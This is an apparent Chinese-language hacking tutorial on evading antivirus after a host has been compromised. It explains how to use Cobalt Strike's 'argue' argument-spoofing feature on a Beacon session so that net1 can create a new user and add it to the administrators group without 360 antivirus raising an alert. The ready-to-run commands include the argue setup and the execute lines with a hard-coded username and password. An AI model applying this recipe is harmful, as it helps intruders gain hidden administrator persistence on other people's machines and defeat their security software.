在獲取了對方主機CobaltStrike Beacon後,需要執行一些敏感的操作(如創建用戶等)。但是目標主機有AV,執行敏感命令會直接報毒等,這時我們可以使用Cobaltstrike自帶的argue參數污染來執行敏感操作。
使用argue參數污染創建新用戶並加入管理員組中
使用前提:administrator 或 system權限。
執行創建新用戶命令,360報毒
使用argus參數污染 net1
#參數污染net1
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#查看污染的參數
argue
用污染的 net1 創建用戶,發現創建成功,360也不報毒
#用污染的net1執行敏感操作
execute net1 user test root123 /add
execute net1 localgroup administrators test /add